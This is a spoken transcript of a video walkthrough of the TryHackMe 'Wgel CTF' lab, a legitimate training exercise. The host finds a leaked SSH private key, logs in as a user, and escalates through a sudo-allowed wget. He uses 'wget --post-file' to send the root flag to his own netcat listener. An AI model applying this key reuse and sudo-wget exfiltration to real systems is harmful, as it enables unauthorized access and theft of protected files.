Hello and welcome to another edition of Booze and Hacking. I am your host, Dark Hoodie. We are back with another Try Hack Me room. This one is called Wgel CTF. And we've already started the room. There's our IP address. And there are two flags to be had. So before we begin, let's talk about what we are drinking. This is Magenta Tequila Blanco, and this is some pretty high-end tequila. If you are a tequila fan, I would strongly urge you to run out and get a bottle of this stuff. It is super smooth, no salt, no lime needed. You can just do these shots, but you might well be paying for it the next day. You know how tequila can be sometimes, or as I like to call it, tequila. So, if you're in the mood for a drink, please pour yourself something as we go ahead and tackle this room. So, as you can see, we have begun with the Nmap scan. I've scanned for common ports. Let's see what we've got. I see here that port 22 is running Secure Shell over Ubuntu, and port 80 is running an Apache web server. Alright, so let's go ahead and take a look at what this looks like on our browser, 10.10.209.83. 10.10.209.83. So, as you can see here, we have the default Apache web page. Looks pretty normal here. Let's take a look at the source code, see if we can gain something from there. Alright, this looks normal, nothing to see here. Let's keep scrolling down, maybe we'll find something. Alright, header section empty. This is the default welcome page, that is normal. And oh, there is something here. Jesse, don't forget to update the Webiste, which really should be website. So there is someone named Jesse. That could possibly be a username. We'll tuck that away for later. Let's keep looking at the page. And that's it. So here's a clue for us. Jesse. Okay. Very good. So we've done our scan. And I took the liberty of running a GoBuster scan ahead of time and running the common words list. And what I have here to gain is that there is a subdirectory called sitemap. Okay, so let's go back to this now and add sitemap. And it looks like we have some type of application here. UNAP is called UNAP or UNAP. Take on your biggest projects and goals. Looks like it's some kind of special software, a business type of software. Create your own template, automatic data backup. Let's have a look at this source code. See if there's anything in here. And so far nothing. And still nothing. Let's see, link to can't be removed, template is okay, link back, all right. Okay, so nothing special about this. Now if we go back to our GoBuster scan, I ran another GoBuster scan. This time I added in the sitemap subdirectory and ran the scan again. This time I came up with some other subdirectories. The first one is a .ssh, then a CSS, fonts, images, and a JS. Alright, so this is good because now we can see if there's something else we can derive from here. So I am going to go ahead and click on that first one. And it looks like it's a directory, obviously, but here's something interesting. I see ID underscore RSA. It looks like an RSA key. Let's take a look. All right, we've got an RSA key. That is a good thing because now, since port 22 is open, maybe we can use this to get into the site. So what I'm going to do now, let's see. I'm going to open up another tab on my terminal. I'm going to create a directory here because I'm going to copy that ID into a file. So let's do make directory key directory, we'll call it. And now let's cd into it. cd into key directory. And now I'm going to do nano RSA underscore ID. And now I'm going to take this key and copy this whole thing into here. All right, Control X, and okay. So now I have my RSA ID. Let's see what kind of permissions I have on it. Oh, I need something a bit stronger. Let's do sudo change mod 600 RSA underscore ID. All right. Now I get to try to SSH into it. So I'm going to do SSH-I key, and we're going to use that name Jesse because that's what the clue we got before. We'll use the IP address 10.10.209.83. Identity key not accessible. Let's break out of this for a minute. Let's do RSA underscore ID. Okay, there we go. Let's see if this works. We will say yes. All right, and we're in. Sweet. And we've managed to get into Jesse at Corp 1. Let's see what's in here. Okay, there's the typical folders here on a server. Let's look around. Let's see what's there. So let's go. Well, let's see what's on the desktop. Nothing there. Let's go back. Let's check documents. Oh, and there's our user flag. Sweet. Let's cat that. Cat user underscore flag dot txt. And there's my first flag. So I'm going to copy that and put it into the TryHackMe room. Nice and easy. And now I know what you're all going to say. It's time for the root flag. And I have to find out what the permissions are. So let's do sudo space -l. And let's see, user Jesse may run the following commands on corp1. No password needed if in user/bin if I use wget. Okay, so wget basically will allow us to run commands as root. So let's see what we can find in GTFO. So I'm going to go up here, GTFO bins, and let's see, do I search for wget? And let's see, here we have shell. It can be used to break out from by spawning an interactive system shell. So it looks like I can use wget to possibly transfer the root flag to my machine. See, file upload, wget post file. Okay, that looks promising. This might be the one that I can use. Post file. Send local file with an HTTP. All right. So let's see. This might be the one. Okay. So I think I'm going to be using this one, the file upload. Send local file with HTTP post request. Run service on attack box to collect the file. Okay, so let's go back to the terminal. And I am going to run this command. Going to open up a new tab. Now let's get a listener going. LNVP 4444. Now I'm going to go back here. Let's see if this works. Sudo wget post-file equals the local file, and then the URL. So -- post - file is equal to root, because that's what we want. Root, I'm going to guess, because the user flag had an underscore, user underscore flag, I'm going to assume that the root flag file has the same, follows the same convention. Now I'm going to do http:// and let's just verify my IP one more time. 10.13.6.1.12. 10.13.6.112 colon 4444. Hope this works. Well, it connected to me. Let's go to my listener. Oh, I think that's my flag. Man, this was fantastic. I'm going to copy that. Go back here. Sweet, we are done. Okay, so lessons to be learned with this. Don't leave clues in your websites like usernames. Don't leave RSA keys lying around that can be copied and used. So that's it. If you enjoyed this room, please like and subscribe. And I hope to see you all in the next video. Until then, hack the planet.